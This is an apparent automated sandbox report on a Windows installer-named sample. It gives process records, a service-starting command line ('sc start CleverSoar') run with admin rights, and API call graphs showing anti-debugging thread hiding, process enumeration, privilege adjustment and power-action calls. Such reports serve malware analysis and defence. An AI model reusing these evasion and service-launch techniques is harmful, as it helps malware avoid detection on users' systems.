                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:108
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:2.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:15.5%
                                                          Total number of Nodes:792
                                                          Total number of Limit Nodes:13
std::_Facet_Register 4 API calls 66960->66962 66963 6c0c6a43 std::_Facet_Register 4 API calls 66961->66963 66962->66965 66963->66965 66965->66837 66966 6bf4dcb6 66965->66966 66967 6bf4dccf 66965->66967 66970 6bf4dc69 _Yarn 66965->66970 66968 6c0c6a43 std::_Facet_Register 4 API calls 66966->66968 66969 6c0c6a43 std::_Facet_Register 4 API calls 66967->66969 66968->66970 66969->66970 66971 6c0c5960 104 API calls 66970->66971 66973 6bf4dd1c std::ios_base::_Ios_base_dtor 66971->66973 66972 6c0c4ff0 4 API calls 66972->66900 66973->66820 66973->66972 66975 6c0c5156 66974->66975 66976 6c0c51e8 OpenServiceA 66975->66976 66977 6c0c522f 66975->66977 66976->66975 66977->66869 66983 6c0b03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66978->66983 66979 6c0b3f5f CloseHandle 66979->66983 66980 6c0b310e CloseHandle 66980->66983 66981 6c0b251b CloseHandle 66981->66983 66982 6bf537cb 66986 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66982->66986 66983->66979 66983->66980 66983->66981 66983->66982 66984 6c09c1e0 WriteFile WriteFile WriteFile ReadFile 66983->66984 66999 6c09b730 66983->66999 66984->66983 66986->66835 66987->66863 66988->66886 66989->66914 66993 6c0c52a0 std::locale::_Setgloballocale 66990->66993 66991 6c0c5277 CloseHandle 66991->66993 66992 6c0c5320 Process32NextW 66992->66993 66993->66991 66993->66992 66994 6c0c53b1 66993->66994 66995 6c0c5345 Process32FirstW 66993->66995 66994->66842 66995->66993 66996->66860 66998->66843 67000 6c09b743 _Yarn __wsopen_s std::locale::_Setgloballocale 66999->67000 67001 6c09c180 67000->67001 67002 6c09bced CreateFileA 67000->67002 67004 6c09aa30 67000->67004 67001->66983 67002->67000 67007 6c09aa43 __wsopen_s std::locale::_Setgloballocale 67004->67007 67005 6c09b3e9 WriteFile 67005->67007 67006 6c09b43d WriteFile 67006->67007 67007->67005 67007->67006 67008 6c09b718 67007->67008 67009 6c09ab95 ReadFile 67007->67009 67008->67000 67009->67007 67010 6c0dcad3 
67011 6c0dcae5 __dosmaperr 67010->67011 67012 6c0dcafd 67010->67012 67012->67011 67013 6c0dcb48 __dosmaperr 67012->67013 67015 6c0dcb77 67012->67015 67052 6c0d0120 18 API calls __fassign 67013->67052 67016 6c0dcb90 67015->67016 67018 6c0dcbe7 __wsopen_s 67015->67018 67019 6c0dcbab __dosmaperr 67015->67019 67017 6c0dcb95 67016->67017 67016->67019 67020 6c0e19e5 __wsopen_s 18 API calls 67017->67020 67046 6c0d47bb HeapFree GetLastError __dosmaperr 67018->67046 67045 6c0d0120 18 API calls __fassign 67019->67045 67022 6c0dcd3e 67020->67022 67025 6c0dcdb4 67022->67025 67026 6c0dcd57 GetConsoleMode 67022->67026 67023 6c0dcc07 67047 6c0d47bb HeapFree GetLastError __dosmaperr 67023->67047 67028 6c0dcdb8 ReadFile 67025->67028 67026->67025 67029 6c0dcd68 67026->67029 67031 6c0dce2c GetLastError 67028->67031 67032 6c0dcdd2 67028->67032 67029->67028 67033 6c0dcd6e ReadConsoleW 67029->67033 67030 6c0dcc0e 67042 6c0dcbc2 __dosmaperr __wsopen_s 67030->67042 67048 6c0dac69 20 API calls __wsopen_s 67030->67048 67031->67042 67032->67031 67034 6c0dcda9 67032->67034 67033->67034 67036 6c0dcd8a GetLastError 67033->67036 67038 6c0dce0e 67034->67038 67039 6c0dcdf7 67034->67039 67034->67042 67036->67042 67041 6c0dce25 67038->67041 67038->67042 67050 6c0dcefe 23 API calls 3 library calls 67039->67050 67051 6c0dd1b6 21 API calls __wsopen_s 67041->67051 67049 6c0d47bb HeapFree GetLastError __dosmaperr 67042->67049 67044 6c0dce2a 67044->67042 67045->67042 67046->67023 67047->67030 67048->67017 67049->67011 67050->67042 67051->67044 67052->67011
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: HR^
                                                          • API String ID: 4218353326-1341859651
                                                          • Opcode ID: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                                          • Instruction ID: 0a9c14aa832a8132d31c36b64bce4402c97426ecbcb0784fced2367b4b5edb65
                                                          • Opcode Fuzzy Hash: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                                          • Instruction Fuzzy Hash: 0B74D873644B018FC728CF28C8D0695B7F3EF953147198A6DC09A8B766EB78B54ACB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }jk$;T55$L@^
                                                          • API String ID: 0-4218709813
                                                          • Opcode ID: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                                          • Instruction ID: 0687526a43a6179a4fe510fae3504aa0e3687840b62221c0f24ec427030f930b
                                                          • Opcode Fuzzy Hash: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                                          • Instruction Fuzzy Hash: 553418736447018FC728CF28C8D0A95B7E3EFA5314B198A6DC0E64B765EB38B55ACB50

                                                          Control-flow Graph
                                                          control_flow_graph 7677 6c0c5240-6c0c5275 CreateToolhelp32Snapshot 7678 6c0c52a0-6c0c52a9 7677->7678 7679 6c0c52ab-6c0c52b0 7678->7679 7680 6c0c52e0-6c0c52e5 7678->7680 7683 6c0c5315-6c0c531a 7679->7683 7684 6c0c52b2-6c0c52b7 7679->7684 7681 6c0c52eb-6c0c52f0 7680->7681 7682 6c0c5377-6c0c53a1 call 6c0d2c05 7680->7682 7685 6c0c5277-6c0c5292 CloseHandle 7681->7685 7686 6c0c52f2-6c0c52f7 7681->7686 7682->7678 7687 6c0c53a6-6c0c53ab 7683->7687 7688 6c0c5320-6c0c5332 Process32NextW 7683->7688 7690 6c0c52b9-6c0c52be 7684->7690 7691 6c0c5334-6c0c535d call 6c0cb920 Process32FirstW 7684->7691 7685->7678 7686->7678 7692 6c0c52f9-6c0c5313 7686->7692 7687->7678 7696 6c0c53b1-6c0c53bf 7687->7696 7693 6c0c5362-6c0c5372 7688->7693 7690->7678 7697 6c0c52c0-6c0c52d1 7690->7697 7691->7693 7692->7678 7693->7678 7697->7678
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0C524E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3332741929-0
                                                          • Opcode ID: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                                          • Instruction ID: 9df2e85a24ed6d71813130110880076a77d390e34ee64ce851a09314e2004afe
                                                          • Opcode Fuzzy Hash: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                                          • Instruction Fuzzy Hash: 5F314978608300AFD7109F28C888B1EBBF4AF9A744F90492EF598C7360D3719848AB53

                                                          Control-flow Graph
                                                          control_flow_graph 7821 6bf43886-6bf4388e 7822 6bf43894-6bf43896 7821->7822 7823 6bf43970-6bf4397d 7821->7823 7822->7823 7824 6bf4389c-6bf438b9 7822->7824 7825 6bf439f1-6bf439f8 7823->7825 7826 6bf4397f-6bf43989 7823->7826 7830 6bf438c0-6bf438c1 7824->7830 7828 6bf43ab5-6bf43aba 7825->7828 7829 6bf439fe-6bf43a03 7825->7829 7826->7824 7827 6bf4398f-6bf43994 7826->7827 7831 6bf43b16-6bf43b18 7827->7831 7832 6bf4399a-6bf4399f 7827->7832 7828->7824 7836 6bf43ac0-6bf43ac7 7828->7836 7833 6bf438d2-6bf438d4 7829->7833 7834 6bf43a09-6bf43a2f 7829->7834 7835 6bf4395e 7830->7835 7831->7830 7837 6bf439a5-6bf439bf 7832->7837 7838 6bf4383b-6bf43855 call 6c091470 call 6c091480 7832->7838 7841 6bf43957-6bf4395c 7833->7841 7839 6bf43a35-6bf43a3a 7834->7839 7840 6bf438f8-6bf43955 7834->7840 7843 6bf43960-6bf43964 7835->7843 7836->7830 7842 6bf43acd-6bf43ad6 7836->7842 7844 6bf43a5a-6bf43a5d 7837->7844 7847 6bf43860-6bf43885 7838->7847 7845 6bf43a40-6bf43a57 7839->7845 7846 6bf43b1d-6bf43b22 7839->7846 7840->7841 7841->7835 7842->7831 7849 6bf43ad8-6bf43aeb 7842->7849 7843->7847 7848 6bf4396a 7843->7848 7854 6bf43a87-6bf43aa7 7844->7854 7855 6bf43aa9-6bf43ab0 7844->7855 7845->7844 7851 6bf43b24-6bf43b44 7846->7851 7852 6bf43b49-6bf43b50 7846->7852 7847->7821 7856 6bf43ba1-6bf43bb6 7848->7856 7849->7840 7857 6bf43af1-6bf43af8 7849->7857 7851->7854 7852->7830 7861 6bf43b56-6bf43b5d 7852->7861 7854->7855 7855->7843 7859 6bf43bc0-6bf43bda call 6c091470 call 6c091480 7856->7859 7863 6bf43b62-6bf43b85 7857->7863 7864 6bf43afa-6bf43aff 7857->7864 7872 6bf43be0-6bf43bfe 7859->7872 7861->7843 7863->7840 7868 6bf43b8b 7863->7868 7864->7841 7868->7856 7875 6bf43c04-6bf43c11 7872->7875 7876 6bf43e7b 7872->7876 7877 6bf43c17-6bf43c20 7875->7877 7878 6bf43ce0-6bf43cea 7875->7878 7879 6bf43e81-6bf43ee0 call 6bf43750 GetCurrentThread NtSetInformationThread 7876->7879 7881 6bf43dc5 7877->7881 7882 6bf43c26-6bf43c2d 7877->7882 7883 
6bf43cec-6bf43d0c 7878->7883 7884 6bf43d3a-6bf43d3c 7878->7884 7894 6bf43eea-6bf43f04 call 6c091470 call 6c091480 7879->7894 7886 6bf43dc6 7881->7886 7887 6bf43dc3 7882->7887 7888 6bf43c33-6bf43c3a 7882->7888 7889 6bf43d90-6bf43d95 7883->7889 7890 6bf43d70-6bf43d8d 7884->7890 7891 6bf43d3e-6bf43d45 7884->7891 7895 6bf43dc8-6bf43dcc 7886->7895 7887->7881 7896 6bf43e26-6bf43e2b 7888->7896 7897 6bf43c40-6bf43c5b 7888->7897 7892 6bf43d97-6bf43db8 7889->7892 7893 6bf43dba-6bf43dc1 7889->7893 7890->7889 7898 6bf43d50-6bf43d57 7891->7898 7892->7881 7893->7887 7899 6bf43dd7-6bf43ddc 7893->7899 7915 6bf43f75-6bf43fa1 7894->7915 7895->7872 7904 6bf43dd2 7895->7904 7901 6bf43e31 7896->7901 7902 6bf43c7b-6bf43cd0 7896->7902 7903 6bf43e1b-6bf43e24 7897->7903 7898->7886 7905 6bf43e36-6bf43e3d 7899->7905 7906 6bf43dde-6bf43e17 7899->7906 7901->7859 7902->7898 7903->7895 7908 6bf43e76-6bf43e79 7904->7908 7911 6bf43e5c-6bf43e5f 7905->7911 7912 6bf43e3f-6bf43e5a 7905->7912 7906->7903 7908->7879 7911->7902 7914 6bf43e65-6bf43e69 7911->7914 7912->7903 7914->7895 7914->7908 7919 6bf44020-6bf44026 7915->7919 7920 6bf43fa3-6bf43fa8 7915->7920 7921 6bf43f06-6bf43f35 7919->7921 7922 6bf4402c-6bf4403c 7919->7922 7923 6bf4407c-6bf44081 7920->7923 7924 6bf43fae-6bf43fcf 7920->7924 7926 6bf43f38-6bf43f61 7921->7926 7927 6bf440b3-6bf440b8 7922->7927 7928 6bf4403e-6bf44058 7922->7928 7925 6bf440aa-6bf440ae 7923->7925 7929 6bf44083-6bf4408a 7923->7929 7924->7925 7931 6bf43f6b-6bf43f6f 7925->7931 7932 6bf43f64-6bf43f67 7926->7932 7927->7924 7930 6bf440be-6bf440c9 7927->7930 7933 6bf4405a-6bf44063 7928->7933 7929->7926 7934 6bf44090 7929->7934 7930->7925 7935 6bf440cb-6bf440d4 7930->7935 7931->7915 7936 6bf43f69 7932->7936 7937 6bf440f5-6bf4413f 7933->7937 7938 6bf44069-6bf4406c 7933->7938 7934->7894 7939 6bf440d6-6bf440f0 7935->7939 7940 6bf440a7 7935->7940 7936->7931 7937->7936 7942 6bf44144-6bf4414b 7938->7942 7943 6bf44072-6bf44077 7938->7943 7939->7933 7940->7925 7942->7931 7943->7932
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                                          • Instruction ID: 59afb264bfff17e612940b26b4fe49ec36c2c88d8e36a3867b4838c4ff3531be
                                                          • Opcode Fuzzy Hash: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                                          • Instruction Fuzzy Hash: 2A32C433245B018FC334CF28C890695BBE3EFD5314B698A6DC0EA5B666D779B44ACB50

                                                          Control-flow Graph
                                                          control_flow_graph 7969 6bf43a6a-6bf43a85 7970 6bf43a87-6bf43aa7 7969->7970 7971 6bf43aa9-6bf43ab0 7970->7971 7972 6bf43960-6bf43964 7971->7972 7973 6bf43860-6bf4388e 7972->7973 7974 6bf4396a 7972->7974 7984 6bf43894-6bf43896 7973->7984 7985 6bf43970-6bf4397d 7973->7985 7976 6bf43ba1-6bf43bb6 7974->7976 7977 6bf43bc0-6bf43bda call 6c091470 call 6c091480 7976->7977 7993 6bf43be0-6bf43bfe 7977->7993 7984->7985 7987 6bf4389c-6bf438b9 7984->7987 7988 6bf439f1-6bf439f8 7985->7988 7989 6bf4397f-6bf43989 7985->7989 7994 6bf438c0-6bf438c1 7987->7994 7991 6bf43ab5-6bf43aba 7988->7991 7992 6bf439fe-6bf43a03 7988->7992 7989->7987 7990 6bf4398f-6bf43994 7989->7990 7995 6bf43b16-6bf43b18 7990->7995 7996 6bf4399a-6bf4399f 7990->7996 7991->7987 8001 6bf43ac0-6bf43ac7 7991->8001 7997 6bf438d2-6bf438d4 7992->7997 7998 6bf43a09-6bf43a2f 7992->7998 8012 6bf43c04-6bf43c11 7993->8012 8013 6bf43e7b 7993->8013 8000 6bf4395e 7994->8000 7995->7994 8002 6bf439a5-6bf439bf 7996->8002 8003 6bf4383b-6bf43855 call 6c091470 call 6c091480 7996->8003 8007 6bf43957-6bf4395c 7997->8007 8004 6bf43a35-6bf43a3a 7998->8004 8005 6bf438f8-6bf43955 7998->8005 8000->7972 8001->7994 8008 6bf43acd-6bf43ad6 8001->8008 8009 6bf43a5a-6bf43a5d 8002->8009 8003->7973 8010 6bf43a40-6bf43a57 8004->8010 8011 6bf43b1d-6bf43b22 8004->8011 8005->8007 8007->8000 8008->7995 8014 6bf43ad8-6bf43aeb 8008->8014 8009->7970 8009->7971 8010->8009 8016 6bf43b24-6bf43b44 8011->8016 8017 6bf43b49-6bf43b50 8011->8017 8018 6bf43c17-6bf43c20 8012->8018 8019 6bf43ce0-6bf43cea 8012->8019 8021 6bf43e81-6bf43ee0 call 6bf43750 GetCurrentThread NtSetInformationThread 8013->8021 8014->8005 8020 6bf43af1-6bf43af8 8014->8020 8016->7970 8017->7994 8025 6bf43b56-6bf43b5d 8017->8025 8026 6bf43dc5 8018->8026 8027 6bf43c26-6bf43c2d 8018->8027 8028 6bf43cec-6bf43d0c 8019->8028 8029 6bf43d3a-6bf43d3c 8019->8029 8030 6bf43b62-6bf43b85 8020->8030 8031 6bf43afa-6bf43aff 8020->8031 8043 
6bf43eea-6bf43f04 call 6c091470 call 6c091480 8021->8043 8025->7972 8034 6bf43dc6 8026->8034 8036 6bf43dc3 8027->8036 8037 6bf43c33-6bf43c3a 8027->8037 8038 6bf43d90-6bf43d95 8028->8038 8039 6bf43d70-6bf43d8d 8029->8039 8040 6bf43d3e-6bf43d45 8029->8040 8030->8005 8035 6bf43b8b 8030->8035 8031->8007 8044 6bf43dc8-6bf43dcc 8034->8044 8035->7976 8036->8026 8045 6bf43e26-6bf43e2b 8037->8045 8046 6bf43c40-6bf43c5b 8037->8046 8041 6bf43d97-6bf43db8 8038->8041 8042 6bf43dba-6bf43dc1 8038->8042 8039->8038 8047 6bf43d50-6bf43d57 8040->8047 8041->8026 8042->8036 8048 6bf43dd7-6bf43ddc 8042->8048 8064 6bf43f75-6bf43fa1 8043->8064 8044->7993 8053 6bf43dd2 8044->8053 8050 6bf43e31 8045->8050 8051 6bf43c7b-6bf43cd0 8045->8051 8052 6bf43e1b-6bf43e24 8046->8052 8047->8034 8054 6bf43e36-6bf43e3d 8048->8054 8055 6bf43dde-6bf43e17 8048->8055 8050->7977 8051->8047 8052->8044 8057 6bf43e76-6bf43e79 8053->8057 8060 6bf43e5c-6bf43e5f 8054->8060 8061 6bf43e3f-6bf43e5a 8054->8061 8055->8052 8057->8021 8060->8051 8063 6bf43e65-6bf43e69 8060->8063 8061->8052 8063->8044 8063->8057 8068 6bf44020-6bf44026 8064->8068 8069 6bf43fa3-6bf43fa8 8064->8069 8070 6bf43f06-6bf43f35 8068->8070 8071 6bf4402c-6bf4403c 8068->8071 8072 6bf4407c-6bf44081 8069->8072 8073 6bf43fae-6bf43fcf 8069->8073 8075 6bf43f38-6bf43f61 8070->8075 8076 6bf440b3-6bf440b8 8071->8076 8077 6bf4403e-6bf44058 8071->8077 8074 6bf440aa-6bf440ae 8072->8074 8078 6bf44083-6bf4408a 8072->8078 8073->8074 8080 6bf43f6b-6bf43f6f 8074->8080 8081 6bf43f64-6bf43f67 8075->8081 8076->8073 8079 6bf440be-6bf440c9 8076->8079 8082 6bf4405a-6bf44063 8077->8082 8078->8075 8083 6bf44090 8078->8083 8079->8074 8084 6bf440cb-6bf440d4 8079->8084 8080->8064 8085 6bf43f69 8081->8085 8086 6bf440f5-6bf4413f 8082->8086 8087 6bf44069-6bf4406c 8082->8087 8083->8043 8088 6bf440d6-6bf440f0 8084->8088 8089 6bf440a7 8084->8089 8085->8080 8086->8085 8091 6bf44144-6bf4414b 8087->8091 8092 6bf44072-6bf44077 8087->8092 8088->8082 8089->8074 8091->8080 8092->8081
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                                          • Instruction ID: ab7aa1011ceff4506394b6351b08b95281a1150b487f92f5837ad1ba442abbc5
                                                          • Opcode Fuzzy Hash: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                                          • Instruction Fuzzy Hash: 6E51C1335447018FD3308F28C4807D5BBE3BF95314F698A6DC0E65B6A6DB79B44A8B51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                                          • Instruction ID: 4014eebf325d4c710564b06a9eb85b1691d66c16e54d0f856b44d81acc025282
                                                          • Opcode Fuzzy Hash: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                                          • Instruction Fuzzy Hash: 5951B333504B118FD330CF28C480795BBE3BF95314F658A6DC0E65B6A6DB79B44A8B51
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                                          • Instruction ID: 3d4dd3b0884c6f20aa22afd36e391670539d840ef3cbbec3cfa830bccfd9e0c1
                                                          • Opcode Fuzzy Hash: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                                          • Instruction Fuzzy Hash: D531E133649B01CBD730CF28C8847C6BBA3AF96314F154A6DC0A65B6A2DB7974099B51
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                                          • Instruction ID: 6bf8a384f14df3466f3807ac1f142a21085414fd86bf4a892959dfca9bb1b73a
                                                          • Opcode Fuzzy Hash: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                                          • Instruction Fuzzy Hash: 1631EF33108B01CBD734CF28C490796BBB6AF96304F254A6DC0EA5B2A6DB7974498B51
                                                          APIs
                                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0C5130
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
